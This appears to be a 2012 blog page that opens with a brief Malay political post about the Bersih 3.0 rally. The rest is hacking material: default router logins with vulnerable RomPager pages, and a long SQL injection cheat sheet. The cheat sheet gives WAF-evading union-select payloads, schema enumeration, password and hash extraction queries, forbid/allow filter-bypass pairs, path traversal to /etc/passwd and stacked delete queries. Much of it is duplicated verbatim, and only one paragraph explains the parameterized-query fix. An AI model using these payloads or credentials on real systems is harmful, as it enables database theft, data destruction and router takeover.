Monday, March 26, 2012
bersih 3.0,pakatan rakyat,ambiga,anuar ibrahim
Pada 28.4.2012 bersih 3.0 dan pakatan rakyat diketuai oleh pengerusi oleh ambiga dalangnya anuar ibrahim ketua atau wakil melayu untuk dipecah belahkan.bersih 3.0 dan bersih 2.0 akan tiba bersih 4.0. sama juga Bersih 2.0 dan Bersih 3.0 menjelang Bersih 4.0. lapan tuntutan dan 8 tuntutan bersih 3.0
Thursday, March 1, 2012
Router Hacking
#HTTP BANNER=RomPager/4.07 UPnP/1.0
LOGIN=admin:admin
BUGS=wizard/wizardPPP.htm
HTTP BANNER=RomPager/4.51 UPnP/1.0
LOGIN=tmadmin:tmadmin/tmuser:tmuser
BUGS=wzWAN_ManualCfg.html
LOGIN=admin:admin
BUGS=wizard/wizardPPP.htm
HTTP BANNER=RomPager/4.51 UPnP/1.0
LOGIN=tmadmin:tmadmin/tmuser:tmuser
BUGS=wzWAN_ManualCfg.html
[SQLi] Cheat Sheet
group_concat(version(),0x3a,database())
##############################################
group_concat(schema_name)
from information_schema.schemata
##############################################
group_concat(table_name)
.tables where table_schema=database()
##############################################
group_concat(column_name)
.columns where table_schema=database()
##############################################
group_concat(schema_name)
from information_schema.schemata
##############################################
group_concat(table_name)
.tables where table_schema=database()
##############################################
group_concat(column_name)
.columns where table_schema=database()
[SQLi] Union Select/Union All Select
/*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/
UNION SELECT
/*!UNION*/ +/*!ALL*/+/*!SELECT*/
/*!UNION*/ /*!SELECT*/
uNiOn SeLeCt
id=1' /*!12345union*/ select
UNIunionON SEselectLECT
/!*unioN*/ /*!SeLECT*/
and 1=2 union select
/**//*!union*//**//*!sElect*//**//*!aLl*//**/
/*!union*/+/*!select*/+/*!all*/
union select = %2f**/union%2f**/select
/*!UniON*/+/*!SelEct*/
and 1=2 union select
and 1=1 union select
SELECT * FROM articles WHERE id='-1' or 1=1
(0)union(select(table_name),column_name,…
0/**/union/*!50000select*/table_name`foo`/**/…
0%a0union%a0select%09group_concat(table_name)….
0′union all select all`table_name`foo from`information_schema`. `tables`
/*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/+1,2,3,4,5,6,7--
/**/uNiOn/**/SelEct/**/+1,2,3,4,5,6,7--
/*!UNION*/+/*!SELECT*/+1,2,3,4,5-
/**/union/**/select/**/+1,2,3,4,5--
id=1+union+select...
id=1+(UnIoN)+(SelECT)+
id=1+(UnIoN+SeLeCT)+
id=1+(UnI)(oN)+(SeL)(EcT)
id=1+’UnI”On’+'SeL”ECT’
id=1+’UnI’||’on’+SeLeCT’
id=“><script>...
id=/../../../etc/passwd
/(sel)(ect.+fr)(om)/is
/(uni)(on.+sel)(ect)/is
id=1; select 1,2,3
id=1/*union*/union/*select*/select+1,2,3/*
id=1/*uniX on*/union/*selX ect*/select+1,2,3/*
id=1+un/**/ion+sel/**/ect+1,2,3--
id=1;select+1&id=2,3+from+users+where+id=1--
id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users
a=1+union/*&b=*/select+1,2
?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
id=1+OR+0x50=0x50
id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=
id=1+union+(select+1,2+from+users)
/?id=1+union+(select+'xz'from+xxx)
/?id=(1)union(select(1),mid(hash,1,32)from(users))
/?id=1+union+(select'1',concat(login,hash)from+users)
/?id=(1)union(((((((select(1),hex(hash)from(users))))))))
/?id=(1)or(0x50=0x50)
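Filter behaviour (apparently a keyword/signature filter such as a WAF): each "Forbid" line is a request the filter blocks, and the "But allows" line after it is an equivalent request the same filter lets through. Keyword matching therefore does not stop the injection; the id value has to be bound as a query parameter so it is never parsed as SQL.
Forbid: /?id=1+union+select+user,password+from+mysql.user+where+user=1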
But allows: /?id=1+union+select+user,password+from+mysql.user+limit+0,1
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=substring((1),1,1)
But allows: /?id=mid((1),1,1)
Forbid: /?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74
But allows: /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=1+and+5=6
But allows: /?id=1+and+5!=6
Forbid: /?id=1;drop members
But allows: /?id=1;delete members
And allows: /?id=(1);exec('sel'+'ect(1)'+',(xxx)from'+'yyy')
UNION SELECT
/*!UNION*/ +/*!ALL*/+/*!SELECT*/
/*!UNION*/ /*!SELECT*/
uNiOn SeLeCt
id=1' /*!12345union*/ select
UNIunionON SEselectLECT
/!*unioN*/ /*!SeLECT*/
and 1=2 union select
/**//*!union*//**//*!sElect*//**//*!aLl*//**/
/*!union*/+/*!select*/+/*!all*/
union select = %2f**/union%2f**/select
/*!UniON*/+/*!SelEct*/
and 1=2 union select
and 1=1 union select
SELECT * FROM articles WHERE id='-1' or 1=1
(0)union(select(table_name),column_name,…
0/**/union/*!50000select*/table_name`foo`/**/…
0%a0union%a0select%09group_concat(table_name)….
0′union all select all`table_name`foo from`information_schema`. `tables`
/*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/+1,2,3,4,5,6,7--
/**/uNiOn/**/SelEct/**/+1,2,3,4,5,6,7--
/*!UNION*/+/*!SELECT*/+1,2,3,4,5-
/**/union/**/select/**/+1,2,3,4,5--
id=1+union+select...
id=1+(UnIoN)+(SelECT)+
id=1+(UnIoN+SeLeCT)+
id=1+(UnI)(oN)+(SeL)(EcT)
id=1+’UnI”On’+'SeL”ECT’
id=1+’UnI’||’on’+SeLeCT’
id=“><script>...
id=/../../../etc/passwd
/(sel)(ect.+fr)(om)/is
/(uni)(on.+sel)(ect)/is
id=1; select 1,2,3
id=1/*union*/union/*select*/select+1,2,3/*
id=1/*uniX on*/union/*selX ect*/select+1,2,3/*
id=1+un/**/ion+sel/**/ect+1,2,3--
id=1;select+1&id=2,3+from+users+where+id=1--
id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users
a=1+union/*&b=*/select+1,2
?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
id=1+OR+0x50=0x50
id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=
id=1+union+(select+1,2+from+users)
/?id=1+union+(select+'xz'from+xxx)
/?id=(1)union(select(1),mid(hash,1,32)from(users))
/?id=1+union+(select'1',concat(login,hash)from+users)
/?id=(1)union(((((((select(1),hex(hash)from(users))))))))
/?id=(1)or(0x50=0x50)
Forbid: /?id=1+union+select+user,password+from+mysql.user+where+user=1
But allows: /?id=1+union+select+user,password+from+mysql.user+limit+0,1
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=substring((1),1,1)
But allows: /?id=mid((1),1,1)
Forbid: /?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74
But allows: /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=1+and+5=6
But allows: /?id=1+and+5!=6
Forbid: /?id=1;drop members
But allows: /?id=1;delete members
And allows: /?id=(1);exec('sel'+'ect(1)'+',(xxx)from'+'yyy')
[SQLi] Order By
AND substring(version(),1,1)=5
'+order+by+1
"+order+by+1/*
'+order+by+1'--
+order+by+1/*
'+or+1=1+order+by+999/*
'+or+'a'='a+order+by+999/*
+or+1=1/*+order+by+999/*
'+order+by+1
"+order+by+1/*
'+order+by+1'--
+order+by+1/*
'+or+1=1+order+by+999/*
'+or+'a'='a+order+by+999/*
+or+1=1/*+order+by+999/*
[SQLi] Group Concat
CoNcAt(version())
Group_Concat(table_name)
/*!group_concat(table_name)*/
/*!table_name*/
concat_ws(0x3a,user,password,host)
unhex(hex(concat_ws(0x3a,login,password )))
+or+1+group+by+concat
Group_Concat(table_name)
/*!group_concat(table_name)*/
/*!table_name*/
concat_ws(0x3a,user,password,host)
unhex(hex(concat_ws(0x3a,login,password )))
+or+1+group+by+concat
[SQLi] From Information Schema
/**//*!from*//**//*!information_schema.tables*//**//*!where*//**//*!table_schema=database()*/--+-
from /*!information_schema*/.tables
/*!from*/ /*!InfoRmation_SCHEMa*/.`tables`
information_schema.tables LIMIT 1 OFFSET 44
information_schema.columns where table_name=CHAR(105, 110, 102, 111)
from /*!information_schema*/.tables
/*!from*/ /*!InfoRmation_SCHEMa*/.`tables`
information_schema.tables LIMIT 1 OFFSET 44
information_schema.columns where table_name=CHAR(105, 110, 102, 111)
[SQLi] And/Or
+and 1=0-- -
+and 1=1-- -
+and '1'='1
+order+by+99999
+or+1=2
+and+1=2
'
"
\
/*
--+-
/**/
#####
'/*
"/*
'--
"--
';
";
--
;
‘ or 1=1#
‘ or 1=1–+-
‘ or 1=1/* (MySQL < 5.1)
' or 1=1;
' or 1=1 union select 1,2 as `
' or#newline
1='1
' or– -newline
1='1
' /*!50000or*/1='1
' /*!or*/1='1
+
–
~
!
‘ or –+2=- -!!!’2
‘||1=’1
‘&&1=’1
‘=’
‘-’
+and 1=1-- -
+and '1'='1
+order+by+99999
+or+1=2
+and+1=2
'
"
\
/*
--+-
/**/
#####
'/*
"/*
'--
"--
';
";
--
;
‘ or 1=1#
‘ or 1=1–+-
‘ or 1=1/* (MySQL < 5.1)
' or 1=1;
' or 1=1 union select 1,2 as `
' or#newline
1='1
' or– -newline
1='1
' /*!50000or*/1='1
' /*!or*/1='1
+
–
~
!
‘ or –+2=- -!!!’2
‘||1=’1
‘&&1=’1
‘=’
‘-’